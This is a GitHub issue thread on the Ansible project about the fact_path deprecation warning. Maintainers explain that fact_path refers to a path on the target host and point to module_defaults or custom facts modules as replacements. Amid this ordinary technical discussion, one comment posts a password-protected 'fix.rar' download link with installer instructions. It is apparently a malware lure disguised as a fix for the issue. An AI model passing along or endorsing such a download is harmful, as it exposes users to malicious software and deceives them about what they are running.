### ISSUE TITLE
fact_path deprecation warning leaves much unsaid

### ISSUE THREAD

**Issue by philregier** [ansible/ansible#83861]
### Summary

When using `fact_path` in `ansible.cfg` the following deprecation warning results:

```
[DEPRECATION WARNING]: DEFAULT_FACT_PATH option, the module_defaults keyword is a more generic version and can apply to all
 calls to the M(ansible.builtin.gather_facts) or M(ansible.builtin.setup) actions, use module_defaults instead. This 
feature will be removed from ansible-core in version 2.18. Deprecation warnings can be disabled by setting 
deprecation_warnings=False in ansible.cfg.
```

In addition to unfortunate grammar rendering the exact intent of the first sentence a little vague, the implied (?) documentation at https://docs.ansible.com/ansible/latest/playbook_guide/playbooks_module_defaults.html doesn't really clarify the replacement for this specific use case, or even any hints at the reasoning that would illuminate the required changes.

It would seem that the big picture intention (perhaps?) is that repository-wide facts are considered harmful and that the intention of this move was to make it impossible to implement; it is stated that the module defaults "can be used at the play, block, and task level"; should it be obvious what the effect of employing `ansible.builtin.setup` module defaults within a role will be?  Will facts be re-gathered implicitly, or must they be re-gathered explicitly, and if multiple roles reuse the same facts is this duplication both safe and performant?

Most of all, the specific idiosyncrasies of the `fact_path` parameter as documented at https://docs.ansible.com/ansible/latest/collections/ansible/builtin/setup_module.html#parameter-fact_path could use more clarity; despite https://docs.ansible.com/ansible/latest/reference_appendices/config.html#relative-paths-for-configuration stating clearly that "In most of those cases the path used will be relative to the ansible.cfg file used" (which is verifiably true for the `fact_path` config option) and that "using your CWD as the root of relative paths can be a security risk," the setup module's `fact_path` parameter does not honor this behavior, seemingly allowing only absolute and CWD-based paths.  Whether this is a bug or not is unclear to me, as I can't put together a coherent picture from the documentation of what the correct way is to set a repository-wide facts directory without repository-wide mechanisms for doing so, and/or whether setting a "facts" directory relative to ansible.cfg is genuinely considered worse than the other two options.

### Issue Type

Documentation Report

### Component Name

playbook_guide/playbooks_module_defaults.rst

### Ansible Version

```console
$ ansible --version
ansible [core 2.15.3]
```

### Configuration

```console
# NOTE: paths have been sanitized; "/path/to" is identical in each case and represents the root directory of the local repo containing the Ansible project hierarchy.  Relative directories are intact from there.  ALL directories in ansible.cfg are specified as relative paths within the repository; the absolute paths in the output have been added by ansible-config.

# if using a version older than ansible-core 2.12 you should omit the '-t all'
$ ansible-config dump --only-changed -t all
[DEPRECATION WARNING]: DEFAULT_FACT_PATH option, the module_defaults keyword is a more generic version and can apply to all
 calls to the M(ansible.builtin.gather_facts) or M(ansible.builtin.setup) actions, use module_defaults instead. This 
feature will be removed from ansible-core in version 2.18. Deprecation warnings can be disabled by setting 
deprecation_warnings=False in ansible.cfg.
COLLECTIONS_PATHS(/path/to/ansible.cfg) = ['/path/to/collections']
CONFIG_FILE() = /path/to/ansible.cfg
DEFAULT_FACT_PATH(/path/to/ansible.cfg) = facts
DEFAULT_VAULT_PASSWORD_FILE(/path/to/ansible.cfg) = /path/to/etc/vault-pass
PLAYBOOK_DIR(/path/to/ansible.cfg) = /path/to/playbooks
```

### OS / Environment

RHEL8.9

### Additional Information

I don't know what improvements to suggest, as I don't know what the intended combined message is meant to be.

### Code of Conduct

- [X] I agree to follow the Ansible Code of Conduct

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by flowerysong** [comment]
> whether setting a "facts" directory relative to ansible.cfg is genuinely considered worse than the other two options.

`fact_path` configures a location on the target host, setting it relative to `ansible.cfg` would make no sense. Files adjacent to `ansible.cfg` on the controller can be loaded using `include_vars`, host/group vars, `vars_files`, or a vars plugin.

**Comment by bcoca** [comment]
There is no related ansible.cfg on the targets, it only is read on controller.

**Comment by philregier** [comment]
I guess I'm glad I filed this as a documentation issue.  Which documentation did I miss, then, which makes it clear that unlike inventory, collections, and playbooks+roles, fact code is pre-staged on the remote end?  Could this be linked/mentioned somewhere either in deprecation notices or one of the documentation pages I mentioned initially?  Or is this distinction obvious to all other consumers of Ansible documentation except me?

As nuts and bolts go, why are facts unique in this sense?  Do they represent the only part of the remote workflow that can be an arbitrary executable (as opposed to declarative Ansible code that gets translated into strictly patterned Python) and therefore can't be meaningfully/safely/rigorously delivered via the Ansiballz framework?

And if that's at least reasonably close to the general philosophy behind this design (in which case, should I assume that part of the reason for the deprecation in the first place is to reduce ambiguity?), is the expected workflow for repository-level facts to either use early plays or early tasks in a role to stage facts to a locally standardized location, then load the module defaults that point at those facts, then manually (re)gather facts?  What considerations are there for the timing of that ultimate gathering of facts; e.g., is it good practice to write roles to unconditionally regather facts on every invocation, or do people centralize fact management, perhaps as its own role when needed?  Are both strategies equally valid?

**Comment by flowerysong** [comment]
The documentation for facts is located at https://docs.ansible.com/ansible/latest/playbook_guide/playbooks_vars_facts.html; https://docs.ansible.com/ansible/latest/playbook_guide/playbooks_vars_facts.html#facts-d-or-local-facts describes how local facts work. This functionality is also described in the documentation of the module that implements it, https://docs.ansible.com/ansible/latest/collections/ansible/builtin/setup_module.html#parameter-fact_path

There's nothing "unique" about facts, it's very common for modules to interact with things that exist on the remote system, and [modules can be arbitrary executables](https://docs.ansible.com/ansible/latest/dev_guide/developing_program_flow_modules.html#binary-modules).

"repository-level facts" remains a thing you have conceptualized in your head for a problem that you have not described to us in concrete terms, so it's hard for anyone else to tell you how to approach them. It's possible you're talking about things that should just be in [`group_vars/all`](https://docs.ansible.com/ansible/latest/inventory_guide/intro_inventory.html#organizing-host-and-group-variables), or code that should be a [custom facts module](https://docs.ansible.com/ansible/latest/dev_guide/developing_modules_general.html#creating-an-info-or-a-facts-module), or a number of other things.

**Comment by philregier** [comment]
By "repository-level facts" I mean facts that are packaged with the rest of an Ansible code repository like everything else in that repository.  I am working in a semi-portable code repository consisting of various playbooks, inventories, collections, roles with their tasks, files and templates, as well some custom fact executables.  Some of those things Ansible has to be told how to find; most of these are done with ansible.cfg.  Other things Ansible can find relative to the things they already know about; for example, once a playbooks directory has been specified, its roles directory is known by Ansible as well.  Facts, though, don't seem to have a straightforward prescription like the others; I *think* based on what I'm seeing here the expected practice, especially after the deprecation of the fact_path config option, is that for every role that depends on custom facts, that role will contain its own distinct fact path, deploy the relevant asset to that path, and then re-gather facts accordingly.  If six different roles rely on those same custom facts, it might be advantageous for that custom fact script to be owned by a generic service role whose only purpose is to deduplicate code, assets, and fact-gathering steps?

This isn't the first place I've seen the suggestion to replace facts with variables if the code for facts needs to be distributed along with the codebase in question, but variables are subject to a lot of limitations by which custom facts don't seem to be hindered, especially if those facts can't be known ahead of time.  I did try to eliminate the original author's custom facts everywhere I could, replacing them with native Ansible syntax and structure wherever possible, but I ultimately ran into one script that I simply couldn't replace with existing modules.  This original author had an overly complex manual process for custom-installing each Ansible controller by hand which I'm trying to replace with standard, recognizable patterns wherever possible, as my colleagues try to build CI/CD pipelines with the same codebase.

So one last try:  what if custom fact scripts needed to be tested against ephemeral targets in a CI/CD pipeline?  What implementation patterns would be most obvious since Ansible apparently can't transparently locate and stage custom facts scripts for remote execution like (I think) it does with code generated from tasks based on modules?

**Comment by flowerysong** [comment]
Use a custom facts module, like I said previously.

**Comment by s-hertel** [comment]
> It would seem that the big picture intention (perhaps?) is that repository-wide facts are considered harmful...

This isn't the right terminology[^1], but the idea you might be thinking of, is that anything configured on the controller that changes how content runs, makes content less portable. We've been avoiding adding more configuration options like this, and since the fact_path configuration didn't even work like people expected, it was deprecated (rather than adding to that antipattern in order make it work as expected).

[^1]: [Facts](https://docs.ansible.com/ansible/latest/reference_appendices/glossary.html#term-Facts) aren't related to this issue, and "repository-wide" isn't an ansible concept (you might mean the search paths ansible-core uses on the control node).
> So one last try: what if custom fact scripts needed to be tested against ephemeral targets in a CI/CD pipeline? 

You either have the fact_path hardcoded in the ansible.cfg, or as the environment var `ANSIBLE_FACTS_PATH`. The recommendation is just to move this configuration into the content.

```yaml
- hosts: all
  gather_facts: true
  module_defaults:
    ansible.builtin.setup:
      fact_path: "{{ lookup('env', 'CI_FACTS_PATH' }}"  # also update the env var CI sets
```

Using module_defaults like that also applies to any `setup` tasks (or `gather_facts` tasks that use `setup`, as it does by default), unlike the deprecated options (which only applied to the play-level `gather_facts` keyword). If you want to only configure the fact path for the play-level keyword, you can use the play-level keyword for `fact_path` as well like this:

```yaml
- hosts: all
  gather_facts: true
  fact_path: "{{ lookup('env', 'CI_FACTS_PATH') }}"
```

**Comment by philregier** [comment]
Thanks, @s-hertel ; I think you're seeing the vacuum I'm trying to describe, and behind your comments I think are the truths I'm trying to uncover.  I think you're confirming that I've subscribed to the same incorrect assumptions about facts that a lot of people have over time, and that the deprecation in question is motivated in part to put an end to this ongoing misunderstanding and nudge people toward a pattern that adheres to more well-founded assumptions.

While I'm still a bit uncomfortable having each playbook specify each path explicitly (because our repository will have lots of guest contributors over its lifespan who might not understand custom facts any better than I do) it's not objectively a problem.  The bigger concern is not how custom fact scripts are _referenced_, but how they are _put in place_ to begin with.  I think that's what @flowerysong might be getting at?  That a custom facts _script_ has to be explicitly staged one way or another, perhaps within a play, but a custom facts _module_ can be transparently packaged up for remote execution like so much other Ansible content?

This would indeed satisfy the core requirement I'm after -- portable deployment of custom facts code -- and after looking again, I realize I did miss the last documentation link in @flowerysong 's previous comment:

https://docs.ansible.com/ansible/latest/dev_guide/developing_modules_general.html#creating-an-info-or-a-facts-module

From there, further details are linked at https://docs.ansible.com/ansible/latest/dev_guide/developing_locally.html#adding-modules-and-plugins-locally .

Thanks, everyone for your patience; if I'm finally understanding these comments correctly then I think I know how to go about porting old custom facts to a more futureproof, robust pattern.  I do still think it would be possible to leave a more explicit trail of breadcrumbs for people for whom, like myself, the deprecation warning was their first alert to this emergent antipattern and who are looking for a replacement; if it's OK I'll leave this issue open for a little while until I've had a chance to implement and test a replacement, just to make sure I've understood correctly, then submit a few (likely very small) suggested additions to one or two likely landing points in the documentation if I still think that could have helped me find the right solutions in the first place.

**Comment by philregier** [comment]
So I know I asked for this to be left open so I could test some processes and suggest documentation additions, but my project essentially decided to go back to hand-staging custom code.  I personally learned from this thread but I wouldn't want to submit anything that hasn't been tested in a real world scenario by real people.  Since I'm pretty sure I was the only one here who thought there was any improvement to be made in the first place, this issue can probably be closed.
